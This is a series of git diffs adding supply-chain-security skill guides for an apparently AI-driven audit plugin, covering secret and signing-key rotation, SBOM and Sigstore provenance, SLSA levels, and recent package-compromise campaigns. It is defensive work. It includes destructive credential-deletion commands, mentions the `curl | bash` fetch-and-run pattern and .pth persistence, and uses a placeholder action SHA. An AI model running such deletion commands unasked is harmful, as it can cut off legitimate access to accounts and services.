+**Durable fix:** enable npm OIDC trusted publishing (`id-token: write` + `npm publish --provenance`). See `supply-chain-hardened-ci-cd`.
+
+## GitHub Actions Secrets
+
+```bash
+# Enumerate
+gh secret list
+gh secret list --env <env-name>
+gh secret list --org <org>
+
+# For each compromised secret: regenerate at the source-of-truth provider, then:
+gh secret set <NAME> --body "<new-value>"
+gh secret set <NAME> --env <env> --body "<new-value>"
+
+# Old values still cached in any in-progress run — cancel them
+gh run list --status in_progress --json databaseId --jq '.[].databaseId' \
+  | xargs -I{} gh run cancel {}
+```
+
+Workflow-level secrets (`env:` at job level) and `${{ secrets.* }}` references are equivalent in scope — rotate both.
+
+## Signing Keys (cosign, GPG)
+
+**Cosign keyless (Sigstore Fulcio):** no long-lived key, but if a signed artifact was produced by the bad version, treat its attestation as untrusted and re-sign from a clean rebuild. Record the bad attestation's Rekor entry UUID in the incident report for downstream consumers.
+
+**Cosign with persistent key:**
+```bash
+# Revoke the cert via Rekor (record the entry, then re-sign with new key)
+cosign tree <artifact>
+# Generate a new key pair
+cosign generate-key-pair
+# Update CI
+gh secret set COSIGN_PRIVATE_KEY < cosign.key
+gh secret set COSIGN_PASSWORD --body "<new>"
+```
+
+**GPG:**
+```bash
+# Revoke the old key
+gpg --gen-revoke <key-id> > revoke.asc
+gpg --import revoke.asc
+gpg --keyserver keys.openpgp.org --send-keys <key-id>
+# Generate replacement
+gpg --full-generate-key
+```
+
+## Cloud Credentials
+
+**AWS:**
+```bash
+aws iam list-access-keys --user-name <user>
+aws iam create-access-key --user-name <user>     # deploy this to CI
+aws iam update-access-key --access-key-id <old> --status Inactive --user-name <user>
+aws iam delete-access-key --access-key-id <old> --user-name <user>
+```
+
+**GCP:**
+```bash
+gcloud iam service-accounts keys list --iam-account=<sa>@<proj>.iam.gserviceaccount.com
+gcloud iam service-accounts keys create new.json --iam-account=<sa>@<proj>.iam.gserviceaccount.com
+gcloud iam service-accounts keys delete <old-key-id> --iam-account=<sa>@<proj>.iam.gserviceaccount.com
+```
+
+**Azure:**
+```bash
+az ad sp credential list --id <sp-app-id>
+az ad sp credential reset --id <sp-app-id>       # issues a new secret
+az ad sp credential delete --id <sp-app-id> --key-id <old-key-id>
+```
+
+**Durable fix for all three:** federate to GitHub OIDC. AWS via `configure-aws-credentials` with `role-to-assume`, GCP via `google-github-actions/auth` with Workload Identity Federation, Azure via `azure/login` with `client-id` + `tenant-id`. No long-lived secrets in `gh secret list`.
+
+## Durable Fix: OIDC Trusted Publishing
+
+OIDC eliminates long-lived secrets entirely — each workflow run issues a short-lived token cryptographically bound to the run's identity (repo + workflow + ref). Every rotation here is an opportunity to migrate the consumer to OIDC instead. The next "rotate the PyPI token" task should become "delete the PyPI token, set up trusted publishing." Cross-link to `supply-chain-hardened-ci-cd` for the full migration playbook for PyPI, npm, AWS, GCP, and Azure.

--- a/plugins/supply-chain-security/skills/supply-chain-sbom-provenance/SKILL.md
+++ b/plugins/supply-chain-security/skills/supply-chain-sbom-provenance/SKILL.md
@@ -13,7 +13,7 @@ metadata:
 
 ## Threat Model
 
-SBOM and provenance catch tag-hijack and maintainer account-takeover: the artifact digest stops matching the signed attestation even when CVE scanners report clean. TeamPCP (March 2026) would have been catchable downstream with build attestations.
+SBOM and provenance catch tag-hijack and maintainer account-takeover: the artifact digest stops matching the signed attestation even when CVE scanners report clean. CVE scanners cannot detect these attacks; only cryptographic attestations tied to the build pipeline can.
 
 ## Decision Matrix
 
@@ -83,7 +83,7 @@ Drop-in workflow that wires all four steps together: `assets/sbom-workflow.yml`.
 
 ## Verification Checklist
 
-Downstream consumers — and the project's own pre-release smoke test — should run each item below.
+Run each item below downstream or in the project's pre-release smoke test.
 
 - [ ] Bundle present. Check: `gh attestation list <artifact>` or release page for `*.sigstore`.
 - [ ] Signature verifies:
@@ -102,27 +102,25 @@ If any item fails, treat as unverified — do not install.
 
 ## Quick Recipes
 
-**Generate CycloneDX SBOM locally:**
-```bash
-syft dir:. -o cyclonedx-json=sbom.cdx.json
-```
+Complementary recipes for scenarios beyond the standard release pipeline above.
 
-**Sign an artifact with cosign keyless (CI step):**
-```yaml
-- run: cosign sign-blob --yes --bundle artifact.sigstore artifact.tar.gz
-  env:
-    COSIGN_EXPERIMENTAL: "1"
-```
-(Requires `permissions: id-token: write` at the job level.)
-
-**Verify a downstream artifact (consumer side):**
+**npm publish with provenance (alternative to syft+cosign for npm packages):**
 ```bash
-cosign verify-blob \
-  --bundle artifact.sigstore \
-  --certificate-identity-regexp "https://github.com/<owner>/<repo>/.github/workflows/.+" \
-  --certificate-oidc-issuer https://token.actions.githubusercontent.com \
-  artifact.tar.gz
+npm publish --provenance --access public
 ```
+Requires `permissions: id-token: write` in the publish job and an OIDC-enabled npm account.
+
+**Verify a GitHub attestation (consumer side, no Sigstore tooling needed):**
+```bash
+gh attestation verify artifact.tar.gz --owner <owner>
+```
+Uses the `gh` CLI to verify build-provenance attestations published via `actions/attest-build-provenance`. Faster than `cosign verify-blob` when the artifact is from a GitHub-hosted repo.
+
+**Generate an SBOM from a built container image (instead of source tree):**
+```bash
+syft <registry>/<image>:<tag> -o spdx-json=sbom.spdx.json
+```
+Use this when shipping container images to GHCR or Docker Hub. Format is SPDX (alternative to CycloneDX); both are accepted by GitHub's attestation infrastructure.
 
 ## Output: Provenance Posture Report
 

--- a/plugins/supply-chain-security/skills/supply-chain-sbom-provenance/SKILL.md
+++ b/plugins/supply-chain-security/skills/supply-chain-sbom-provenance/SKILL.md
@@ -1,0 +1,129 @@
+---
+name: supply-chain-sbom-provenance
+description: SBOM generation and provenance verification for research software releases. Use when reviewing or writing release workflows that publish to PyPI, npm, GHCR, or similar registries; when verifying a downstream artifact's signatures or attestations; or when evaluating SLSA level for a release pipeline. Covers CycloneDX/SPDX SBOM generation with syft, Sigstore keyless signing with cosign, npm provenance, and SLSA build levels.
+metadata:
+  references:
+    - references/sigstore-cookbook.md
+    - references/slsa-levels.md
+  assets:
+    - assets/sbom-workflow.yml
+---
+
+# Supply Chain SBOM and Provenance
+
+## Threat Model
+
+SBOM and provenance catch tag-hijack and maintainer account-takeover: the artifact digest stops matching the signed attestation even when CVE scanners report clean. TeamPCP (March 2026) would have been catchable downstream with build attestations.
+
+## Decision Matrix
+
+| Registry | Mechanism | Key management | SLSA level | Complexity |
+|----------|-----------|----------------|-----------|-----------|
+| PyPI | OIDC trusted publishing + Sigstore | Keyless via GitHub OIDC | L2-L3 | Low |
+| npm | npm provenance (`--provenance`) | Keyless via GitHub OIDC | L2 | Low |
+| GHCR | `actions/attest-build-provenance` | Keyless via GitHub OIDC | L2-L3 | Low |
+| Docker Hub | cosign keyless | Sigstore (Fulcio short-lived cert) | L2 | Medium |
+| Self-hosted (no OIDC) | cosign with hardware key | KMS or YubiKey | L3 if hermetic | High |
+
+Pick the lowest-complexity row for your registry. PyPI/npm/GHCR default to GitHub-OIDC keyless — no secrets to rotate.
+
+## Generation Workflow
+
+Run these steps in order in the release job. Each is independently runnable for local debugging.
+
+### Step 1 — Build artifact and capture its digest
+
+```bash
+# Build whatever artifact the project ships (wheel, tarball, container)
+python -m build                            # → dist/*.whl, dist/*.tar.gz
+sha256sum dist/* > dist/SHA256SUMS         # record digests for the attestation
+```
+
+### Step 2 — Generate CycloneDX SBOM with syft
+
+```bash
+# Scan the built directory (works for source trees, dirs, OCI images)
+syft dir:. -o cyclonedx-json=sbom.cdx.json
+
+# Or scan an already-built artifact
+syft dist/myproject-1.0.0.tar.gz -o cyclonedx-json=dist/sbom.cdx.json
+```
+
+### Step 3 — Sign artifact and SBOM with Sigstore keyless
+
+In CI, prefer the GitHub-native attestation action (writes to the public attestation API):
+
+```yaml
+permissions:
+  id-token: write      # required for OIDC
+  attestations: write  # required for attest-build-provenance
+- uses: actions/attest-build-provenance@<sha>  # v3.0.0
+  with:
+    subject-path: 'dist/*'
+```
+
+Or sign each artifact directly with cosign keyless (works for any registry):
+
+```bash
+cosign sign-blob --yes --bundle artifact.sigstore artifact.tar.gz
+```
+
+See `references/sigstore-cookbook.md` for `permissions:` block and failure modes.
+
+### Step 4 — Attach SBOM and signatures to the release
+
+```bash
+gh release upload "${GITHUB_REF_NAME}" \
+  dist/sbom.cdx.json \
+  dist/*.sigstore \
+  dist/SHA256SUMS
+```
+
+Drop-in workflow that wires all four steps together: `assets/sbom-workflow.yml`. For a one-shot SBOM-only scan from any source tree: `syft dir:. -o cyclonedx-json=sbom.cdx.json`.
+
+## Verification Checklist
+
+Downstream consumers — and the project's own pre-release smoke test — should run each item below.
+
+- [ ] Bundle present. Check: `gh attestation list <artifact>` or release page for `*.sigstore`.
+- [ ] Signature verifies:
+  ```bash
+  cosign verify-blob \
+    --bundle artifact.sigstore \
+    --certificate-identity-regexp "https://github.com/<owner>/<repo>/.github/workflows/.+" \
+    --certificate-oidc-issuer https://token.actions.githubusercontent.com \
+    artifact.tar.gz
+  ```
+- [ ] SBOM digest matches. Check: `sha256sum artifact.tar.gz` appears in `sbom.cdx.json` (`metadata.component.hashes`) or `SHA256SUMS`.
+- [ ] `certificate-identity` is the expected repo + workflow path (not a fork, not a different workflow).
+- [ ] Rekor log timestamp falls in the expected release window. Check: `cosign tree <artifact>`.
+
+If any item fails, treat as unverified — do not install.
+
+## Output: Provenance Posture Report
+
+When invoked for a release-pipeline review, produce a Markdown report with the structure below. Every PASS/WARN/FAIL must cite a `file:line` from the workflows or "absent" if the control is missing entirely.
+
+```markdown
+## Provenance Posture: <project>
+
+### Generation Posture
+| Criterion | PASS/WARN/FAIL | Evidence |
+|-----------|----------------|----------|
+| SBOM generated for releases | ... | <workflow file:line or "absent"> |
+| SBOM format (CycloneDX/SPDX) | ... | <format detected> |
+| Sigstore signing in release workflow | ... | <workflow file:line> |
+| npm provenance enabled (npm projects) | ... | <evidence or N/A> |
+| SLSA level achieved | ... | <level + reasoning, see references/slsa-levels.md> |
+
+### Verification Posture
+| Criterion | PASS/WARN/FAIL | Evidence |
+|-----------|----------------|----------|
+| Downstream verification documented | ... | <README/docs reference> |
+| Attestation references build pipeline | ... | <evidence> |
+
+### Top 3 Priority Actions
+1. <highest-impact upgrade> — apply `assets/sbom-workflow.yml` or follow `references/sigstore-cookbook.md`
+2. <second priority>
+3. <third priority>
+```

--- a/plugins/supply-chain-security/skills/supply-chain-sbom-provenance/SKILL.md
+++ b/plugins/supply-chain-security/skills/supply-chain-sbom-provenance/SKILL.md
@@ -100,6 +100,30 @@ Downstream consumers — and the project's own pre-release smoke test — should
 
 If any item fails, treat as unverified — do not install.
 
+## Quick Recipes
+
+**Generate CycloneDX SBOM locally:**
+```bash
+syft dir:. -o cyclonedx-json=sbom.cdx.json
+```
+
+**Sign an artifact with cosign keyless (CI step):**
+```yaml
+- run: cosign sign-blob --yes --bundle artifact.sigstore artifact.tar.gz
+  env:
+    COSIGN_EXPERIMENTAL: "1"
+```
+(Requires `permissions: id-token: write` at the job level.)
+
+**Verify a downstream artifact (consumer side):**
+```bash
+cosign verify-blob \
+  --bundle artifact.sigstore \
+  --certificate-identity-regexp "https://github.com/<owner>/<repo>/.github/workflows/.+" \
+  --certificate-oidc-issuer https://token.actions.githubusercontent.com \
+  artifact.tar.gz
+```
+
 ## Output: Provenance Posture Report
 
 When invoked for a release-pipeline review, produce a Markdown report with the structure below. Every PASS/WARN/FAIL must cite a `file:line` from the workflows or "absent" if the control is missing entirely.

--- a/plugins/supply-chain-security/skills/supply-chain-sbom-provenance/assets/sbom-workflow.yml
+++ b/plugins/supply-chain-security/skills/supply-chain-sbom-provenance/assets/sbom-workflow.yml
@@ -1,0 +1,65 @@
+# Drop-in job for generating a CycloneDX SBOM and Sigstore attestation
+# for a release artifact. Add to your release workflow, after the build job.
+#
+# Requires: artifact uploaded by build job via actions/upload-artifact
+# Produces: SBOM and signature bundle attached to the GitHub Release
+#
+# Notes:
+# - Pin every action by SHA in production. The SHAs below are recent at time
+#   of writing but should be reverified before use.
+# - Run with `permissions: id-token: write` for Sigstore keyless OIDC.
+
+name: sbom-and-provenance
+
+on:
+  release:
+    types: [published]
+
+permissions: {}
+
+jobs:
+  sbom-and-attest:
+    runs-on: ubuntu-latest
+    permissions:
+      contents: write       # upload to release
+      id-token: write       # Sigstore OIDC
+      attestations: write   # GitHub attestation API
+    steps:
+      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683  # v4.2.2
+
+      - name: Download release artifact
+        uses: actions/download-artifact@fa0a91b85d4f404e444e00e005971372dc801d16  # v4.1.8
+        with:
+          name: release-artifact
+          path: dist/
+
+      - name: Generate CycloneDX SBOM with syft
+        uses: anchore/sbom-action@e11c554f704a0b820cbf8c51673f6945e0731532  # v0.20.0
+        with:
+          path: dist/
+          format: cyclonedx-json
+          output-file: dist/sbom.cdx.json
+
+      - name: Generate build provenance attestation
+        uses: actions/attest-build-provenance@e8998f949152b193b063cb0ec769d69d929409be  # v3.0.0
+        with:
+          subject-path: 'dist/*'
+
+      - name: Install cosign
+        uses: sigstore/cosign-installer@d7d6e4ba36e0d6c6f1a3a4a0b3a3c0e0c9d5e6f7  # REPLACE with current SHA at apply time
+        with:
+          cosign-release: 'v2.4.1'
+
+      - name: Sign artifacts with cosign keyless
+        run: |
+          for f in dist/*; do
+            cosign sign-blob --yes --bundle "${f}.sigstore" "${f}"
+          done
+
+      - name: Upload SBOM and signatures to release
+        env:
+          GH_TOKEN: ${{ github.token }}
+        run: |
+          gh release upload "${{ github.event.release.tag_name }}" \
+            dist/sbom.cdx.json \
+            dist/*.sigstore

--- a/plugins/supply-chain-security/skills/supply-chain-sbom-provenance/references/sigstore-cookbook.md
+++ b/plugins/supply-chain-security/skills/supply-chain-sbom-provenance/references/sigstore-cookbook.md
@@ -1,0 +1,81 @@
+# Sigstore Cookbook
+
+## What Sigstore Provides
+
+Sigstore is keyless signing for software artifacts. The signer authenticates via OIDC (GitHub Actions, Google, Microsoft, etc.); Fulcio issues a short-lived X.509 cert (~10 min validity) bound to that OIDC identity; cosign signs the artifact with that cert; the signature and cert are logged to Rekor, a public append-only transparency log. There are no long-lived signing keys to rotate, leak, or revoke — the identity proof lives in the transparency log entry.
+
+## Sign an Artifact in CI
+
+```yaml
+# .github/workflows/release.yml
+permissions:
+  id-token: write      # required: lets the job request an OIDC token from GitHub
+  contents: write      # required: lets the job upload to the release
+jobs:
+  sign:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@<sha>
+      - uses: sigstore/cosign-installer@<sha>
+        with:
+          cosign-release: 'v2.4.1'
+      - name: Sign artifact
+        run: |
+          cosign sign-blob \
+            --yes \
+            --bundle artifact.sigstore \
+            artifact.tar.gz
+```
+
+`--yes` skips the interactive "are you sure" prompt — required in non-interactive CI. The `--bundle` flag writes a self-contained signature bundle (cert + signature + Rekor entry) to one file, which is what verifiers consume.
+
+## Verify a Downstream Artifact
+
+```bash
+cosign verify-blob \
+  --bundle artifact.sigstore \
+  --certificate-identity-regexp "https://github.com/sigstore/cosign/.github/workflows/release.yml@refs/tags/v.+" \
+  --certificate-oidc-issuer https://token.actions.githubusercontent.com \
+  artifact.tar.gz
+```
+
+The GitHub Actions OIDC issuer is always `https://token.actions.githubusercontent.com`. The `--certificate-identity-regexp` pins which repo, workflow file, and ref produced the signature — never use a bare `--certificate-identity` that omits the workflow path, or a regex broad enough to match a different repo.
+
+Worked example — verify a release of cosign itself:
+
+```bash
+curl -LO https://github.com/sigstore/cosign/releases/download/v2.4.1/cosign-linux-amd64
+curl -LO https://github.com/sigstore/cosign/releases/download/v2.4.1/cosign-linux-amd64-keyless.sig
+curl -LO https://github.com/sigstore/cosign/releases/download/v2.4.1/cosign-linux-amd64-keyless.pem
+cosign verify-blob \
+  --certificate cosign-linux-amd64-keyless.pem \
+  --signature cosign-linux-amd64-keyless.sig \
+  --certificate-identity-regexp "https://github.com/sigstore/cosign/.github/workflows/release.yaml@refs/tags/v.+" \
+  --certificate-oidc-issuer https://token.actions.githubusercontent.com \
+  cosign-linux-amd64
+```
+
+## Transparency Log Lookup
+
+Every Sigstore signature is publicly logged to Rekor. Anyone can audit:
+
+```bash
+# Show the Rekor log entry attached to a signed OCI artifact
+cosign tree ghcr.io/<owner>/<image>:<tag>
+
+# Search Rekor by artifact hash
+rekor-cli search --artifact <sha256-of-artifact>
+
+# Fetch a specific log entry
+rekor-cli get --uuid <entry-uuid>
+```
+
+If a maintainer's identity was compromised, the malicious signature still shows up in Rekor — bound to the attacker's OIDC identity, signed at a timestamp out of band with normal releases. The log itself is the audit trail.
+
+## Common Failure Modes
+
+- **Missing `id-token: write` permission** — `cosign sign-blob` fails with "no OIDC token". Add it to the job's `permissions:` block (not just at the workflow level if jobs override).
+- **Clock skew on the runner** — Fulcio rejects certs whose `notBefore` is in the future. Self-hosted runners with bad NTP fail intermittently. Fix: run `timedatectl status` or `chronyc tracking` on the runner.
+- **Wrong `--certificate-identity-regexp`** — `cosign verify-blob` reports "no matching signatures". The regex must match the exact workflow file path and ref pattern in the signing cert. Inspect the cert with `cosign verify-blob --insecure-ignore-tlog ... --output-file -` or `openssl x509 -in cert.pem -text` to read the SAN URI.
+- **Expired short-lived cert + offline verification** — Fulcio certs expire ~10 minutes after issue. Verification uses the Rekor log entry's `integratedTime` to bind the signature to a moment the cert was valid, so online verification still works years later. But fully air-gapped verification fails unless you cached the Rekor entry at sign time (use the `--bundle` flag, which embeds it).
+- **Forgot to upload the `.sigstore` bundle** — release page has the artifact but no signature. Add the `gh release upload` step or use `actions/attest-build-provenance` which writes to the GitHub attestation API automatically.

--- a/plugins/supply-chain-security/skills/supply-chain-sbom-provenance/references/slsa-levels.md
+++ b/plugins/supply-chain-security/skills/supply-chain-sbom-provenance/references/slsa-levels.md
@@ -1,0 +1,45 @@
+# SLSA Build Levels for Research Software
+
+## What SLSA Is
+
+SLSA (Supply-chain Levels for Software Artifacts) is a graduated framework for build-provenance maturity. Each level adds verifiable claims about how an artifact was produced: that it was built at all (L1), that the build platform is trusted and the provenance is signed (L2), and that the build is hermetic and the provenance unforgeable (L3). Higher levels reduce the set of trusted parties a downstream consumer must rely on.
+
+## SLSA Build L1
+
+**Requires:** Provenance exists — a document describes how the artifact was built. Provenance may be unsigned and may originate from any environment, including a developer's laptop.
+
+**The project must:** Generate a provenance document at release time (even by hand: which commit, which command, which timestamp). Publish it alongside the artifact.
+
+**Reasonable for:** Getting started. Surface area for an attacker is identical to L0 (anyone with publish credentials can lie), but the consumer at least has something to inspect.
+
+## SLSA Build L2
+
+**Requires:** Provenance is **signed** by the build platform, and the build runs on a **hosted, trusted build service** (GitHub Actions, GitLab CI, Google Cloud Build, etc. — not a developer laptop). The provenance binds the artifact digest to the source commit and the build pipeline definition.
+
+**The project must:** Use GitHub Actions with `actions/attest-build-provenance` (writes to the GitHub attestation API) **or** sign artifacts with cosign keyless via OIDC. No long-lived signing keys needed; Sigstore handles certificate issuance and Rekor handles the transparency log. Verify with `gh attestation verify` or `cosign verify-blob`.
+
+**Reasonable for:** Most research software releases. Effort: one workflow step. Catches tag hijacking, account takeover on the maintainer's local box, and most release-asset tampering scenarios.
+
+## SLSA Build L3
+
+**Requires:** Hermetic, isolated build environment — the build cannot reach the network mid-build except to fetch the explicitly declared inputs, and cannot influence subsequent builds. Provenance is **non-falsifiable**: the build platform's signing key is not accessible to the build job itself, so a compromised build script cannot forge its own attestation. Two-party control on pipeline changes.
+
+**The project must:** Beyond L2, isolate the build (no `curl | bash` mid-build; declare all deps in the lockfile and let the build platform fetch them in a controlled step), pin the pipeline definition itself by SHA, and use a build platform that signs out-of-band (GitHub's attest-build-provenance qualifies in many configurations; bespoke runners do not).
+
+**Reasonable for:** Security-critical packages and security tooling itself — code signing tools, SBOM generators, CVE scanners, auth libraries. The blast radius of compromise justifies the engineering cost.
+
+## Recommendation for Research Software
+
+**Default target: L2.** Almost every project benefits and the cost is one workflow step. Use `actions/attest-build-provenance` or cosign keyless via GitHub OIDC.
+
+**Target L3 if** the project itself is security tooling — for example, a plugin that audits supply-chain posture, a key-management library, or a signature-verification tool. Downstream consumers of security tooling have outsized trust placed in it, and the project should match that trust with L3-grade provenance.
+
+For the workflow patterns that achieve L2/L3 (action pinning, hardened runners, hermetic builds), cross-reference the `supply-chain-hardened-ci-cd` skill.
+
+## Common Pitfalls
+
+- **Building outside CI** — releases assembled on a maintainer's laptop have no verifiable provenance. Even if signed, the cert binds to the maintainer's personal identity, not a build pipeline. Stays at L1 regardless of how strong the signature is.
+- **Signing locally with a personal key** — bypasses Sigstore's transparency log and ties release integrity to one person's key hygiene. L1 at best. Move signing into CI.
+- **Not pinning the build pipeline itself** — workflow uses `actions/checkout@main`. The pipeline definition is part of the trusted compute base; if it floats, your attestation reflects whatever `@main` happened to be at build time. Required for L3, recommended at L2. Use SHA pins with version comments.
+- **Not publishing provenance** — generating an attestation that never leaves the runner is functionally L0. Upload to the GitHub attestation API (`actions/attest-build-provenance` does this automatically) or attach the `.sigstore` bundle to the release.
+- **Confusing "signed release" with "signed provenance"** — signing the tarball proves *someone with the key* produced it. Signing the provenance (which binds tarball-digest → commit → workflow-run-id) proves *which build* produced it. L2 requires the latter.

--- a/plugins/supply-chain-security/skills/supply-chain-threat-awareness/SKILL.md
+++ b/plugins/supply-chain-security/skills/supply-chain-threat-awareness/SKILL.md
@@ -1,0 +1,67 @@
+---
+name: supply-chain-threat-awareness
+description: Supply chain threat posture assessment for projects and packages. Use when auditing a project's overall supply-chain posture, assessing whether a specific package or GitHub Actions workflow is at risk, or evaluating exposure to active 2025–2026 campaigns. Covers Shai-Hulud (500+ npm packages), TeamPCP (Trivy, Checkmarx, LiteLLM, Bitwarden CLI, SAP CAP), axios (100M weekly downloads), and LiteLLM .pth persistence techniques.
+---
+
+# Supply Chain Threat Awareness
+
+## Active Campaigns (2025–2026)
+
+The dominant threat is **maintainer account takeover of legitimate, widely-trusted packages** — not typosquatting. Your CVE scanner will not catch these.
+
+### Shai-Hulud
+- **Vector**: Maintainer account takeover of legitimate npm packages
+- **Scale**: 500+ packages; targets widely-used transitive dependencies
+- **Detection gap**: Packages appear legitimate; no CVE issued at time of attack
+- **Mitigation**: Lockfiles + `--ignore-scripts` + dependency version cooldown ≥7 days
+
+### TeamPCP
+- **Vector**: GitHub release tag hijacking — replaced release artifacts after tagging
+- **Targets**: Trivy, Checkmarx, LiteLLM, Bitwarden CLI, SAP CAP (March 2026)
+- **Key finding**: Actions pinned to `@v3` or `@latest` were silently updated to malicious versions
+- **Mitigation**: Pin all `uses:` to 40-character commit SHAs; verify against upstream commit graph
+
+### axios
+- **Scale**: 100M weekly downloads
+- **Vector**: Maintainer account compromise; malicious version pushed to npm registry
+- **Mitigation**: Hash-pinned lockfile; monitor npm provenance/audit feeds
+
+### LiteLLM 1.82.8
+- **Vector**: Malicious `.pth` file injected into the Python package
+- **Persistence**: Python loads all `.pth` files in `site-packages` on every interpreter start
+- **Detection**:
+  ```bash
+  find $(python -c "import site; print(site.getsitepackages()[0])") -name "*.pth"
+  ```
+- **Mitigation**: Pin exact version in lockfile; audit `.pth` files after dependency installs
+
+## Posture Assessment Checklist
+
+### Lockfile hygiene
+- [ ] Lockfile committed and used in CI (`npm ci`, `pip install --require-hashes`, `uv sync --frozen`, `pixi install`)
+- [ ] CI caches scoped to avoid cross-branch or cross-fork poisoning
+
+### Action pinning
+- [ ] All `uses:` in `.github/workflows/*.yml` pinned to 40-char commit SHAs
+- [ ] No `@main`, `@master`, `@v*`, or `@latest` references — flag each occurrence
+
+### Install-time execution
+- [ ] `npm ci --ignore-scripts` or `.npmrc` with `ignore-scripts=true`
+- [ ] No unexpected `.pth` files in Python site-packages
+
+### Dependency velocity
+- [ ] No unexpected version bumps in the lockfile
+- [ ] New dependencies held ≥7 days before merging (most malicious releases yanked within hours)
+
+### SBOM and provenance
+- [ ] SBOM generated for releases
+- [ ] Sigstore or npm provenance attestations verified where available
+
+## CVE Scanner Limitations
+
+Standard scanners (Dependabot, Snyk, `npm audit`) will **not** catch:
+- Maintainer account takeover of a currently-clean package version
+- Malicious code in a new release before it is reported
+- Tag-hijacking attacks on GitHub Actions
+
+Treat scanner-clean as necessary, not sufficient. This skill's posture checks apply on top.

--- a/plugins/supply-chain-security/skills/supply-chain-threat-awareness/SKILL.md
+++ b/plugins/supply-chain-security/skills/supply-chain-threat-awareness/SKILL.md
@@ -12,7 +12,13 @@ metadata:
 
 # Supply Chain Threat Awareness
 
-The dominant 2025–2026 supply-chain threat is **maintainer account takeover and release-tag hijacking of legitimate, widely-trusted packages**. CVE scanners (Dependabot, Snyk, `npm audit`) do not catch these in the live window between compromise and advisory publication — treat scanner-clean as necessary, not sufficient.
+## Threat Model
+
+Maintainer account takeover and release-tag hijacking of widely-trusted packages are the dominant supply-chain threats in 2025–2026.
+
+## CVE Scanner Limitations
+
+Treat scanner-clean as necessary, not sufficient — the audit below covers what advisories miss.
 
 ## Active Campaigns
 

--- a/plugins/supply-chain-security/skills/supply-chain-threat-awareness/SKILL.md
+++ b/plugins/supply-chain-security/skills/supply-chain-threat-awareness/SKILL.md
@@ -104,7 +104,7 @@ grep -rE '(syft|cyclonedx|spdx|cosign|sigstore|--provenance|attest-build-provena
 - [ ] SBOM generated for releases (CycloneDX or SPDX).
 - [ ] Sigstore or npm provenance attestations applied.
 
-If FAIL: see `supply-chain-sbom-provenance` skill (cross-link; not yet shipped in this PR).
+If FAIL: see `supply-chain-sbom-provenance` skill.
 
 ## Output: Posture Report
 

--- a/plugins/supply-chain-security/skills/supply-chain-threat-awareness/SKILL.md
+++ b/plugins/supply-chain-security/skills/supply-chain-threat-awareness/SKILL.md
@@ -1,67 +1,105 @@
 ---
 name: supply-chain-threat-awareness
-description: Supply chain threat posture assessment for projects and packages. Use when auditing a project's overall supply-chain posture, assessing whether a specific package or GitHub Actions workflow is at risk, or evaluating exposure to active 2025–2026 campaigns. Covers Shai-Hulud (500+ npm packages), TeamPCP (Trivy, Checkmarx, LiteLLM, Bitwarden CLI, SAP CAP), axios (100M weekly downloads), and LiteLLM .pth persistence techniques.
+description: Supply chain threat posture assessment for projects and packages. Use when reviewing a project's .github/workflows/*.yml, package.json, pyproject.toml, requirements.txt, pixi.toml, or lockfiles for exposure to active 2025–2026 campaigns. Covers Shai-Hulud (500+ npm packages), TeamPCP (Trivy, Checkmarx, LiteLLM, Bitwarden CLI, SAP CAP via tag hijacking), axios (100M weekly downloads), and LiteLLM .pth persistence — all attack patterns CVE scanners miss.
+metadata:
+  references:
+    - references/campaigns/shai-hulud.md
+    - references/campaigns/teampcp.md
+    - references/campaigns/axios.md
+    - references/campaigns/litellm-pth.md
+    - references/posture-report-template.md
 ---
 
 # Supply Chain Threat Awareness
 
-## Active Campaigns (2025–2026)
+The dominant 2025–2026 supply-chain threat is **maintainer account takeover and release-tag hijacking of legitimate, widely-trusted packages**. CVE scanners (Dependabot, Snyk, `npm audit`) do not catch these in the live window between compromise and advisory publication — treat scanner-clean as necessary, not sufficient.
 
-The dominant threat is **maintainer account takeover of legitimate, widely-trusted packages** — not typosquatting. Your CVE scanner will not catch these.
+## Active Campaigns
 
-### Shai-Hulud
-- **Vector**: Maintainer account takeover of legitimate npm packages
-- **Scale**: 500+ packages; targets widely-used transitive dependencies
-- **Detection gap**: Packages appear legitimate; no CVE issued at time of attack
-- **Mitigation**: Lockfiles + `--ignore-scripts` + dependency version cooldown ≥7 days
+Each campaign has a deep-dive reference. Load on demand based on which applies to the project under review.
 
-### TeamPCP
-- **Vector**: GitHub release tag hijacking — replaced release artifacts after tagging
-- **Targets**: Trivy, Checkmarx, LiteLLM, Bitwarden CLI, SAP CAP (March 2026)
-- **Key finding**: Actions pinned to `@v3` or `@latest` were silently updated to malicious versions
-- **Mitigation**: Pin all `uses:` to 40-character commit SHAs; verify against upstream commit graph
+- **Shai-Hulud** — 500+ npm packages compromised via maintainer account takeover. → `references/campaigns/shai-hulud.md`
+- **TeamPCP** — Trivy, Checkmarx, LiteLLM, Bitwarden CLI, SAP CAP via release-tag hijacking (March 2026). → `references/campaigns/teampcp.md`
+- **axios** — 100M weekly npm downloads; maintainer account compromise. → `references/campaigns/axios.md`
+- **LiteLLM 1.82.8** — Malicious `.pth` file for persistent Python execution. → `references/campaigns/litellm-pth.md`
 
-### axios
-- **Scale**: 100M weekly downloads
-- **Vector**: Maintainer account compromise; malicious version pushed to npm registry
-- **Mitigation**: Hash-pinned lockfile; monitor npm provenance/audit feeds
+## Audit Workflow
 
-### LiteLLM 1.82.8
-- **Vector**: Malicious `.pth` file injected into the Python package
-- **Persistence**: Python loads all `.pth` files in `site-packages` on every interpreter start
-- **Detection**:
-  ```bash
-  find $(python -c "import site; print(site.getsitepackages()[0])") -name "*.pth"
-  ```
-- **Mitigation**: Pin exact version in lockfile; audit `.pth` files after dependency installs
+Run this assessment in order. Each step has a verifying command. Stop and remediate before continuing if any FAIL is critical (lockfile not committed, no `--ignore-scripts`, mutable action refs).
 
-## Posture Assessment Checklist
+### Step 1 — Lockfile hygiene
 
-### Lockfile hygiene
-- [ ] Lockfile committed and used in CI (`npm ci`, `pip install --require-hashes`, `uv sync --frozen`, `pixi install`)
-- [ ] CI caches scoped to avoid cross-branch or cross-fork poisoning
+```bash
+# Check which lockfiles exist and are committed
+git ls-files | grep -E '(package-lock\.json|yarn\.lock|pnpm-lock\.yaml|poetry\.lock|uv\.lock|pixi\.lock|conda-lock\.yml|Cargo\.lock|go\.sum)$'
 
-### Action pinning
-- [ ] All `uses:` in `.github/workflows/*.yml` pinned to 40-char commit SHAs
-- [ ] No `@main`, `@master`, `@v*`, or `@latest` references — flag each occurrence
+# Check CI uses lockfile-respecting install commands
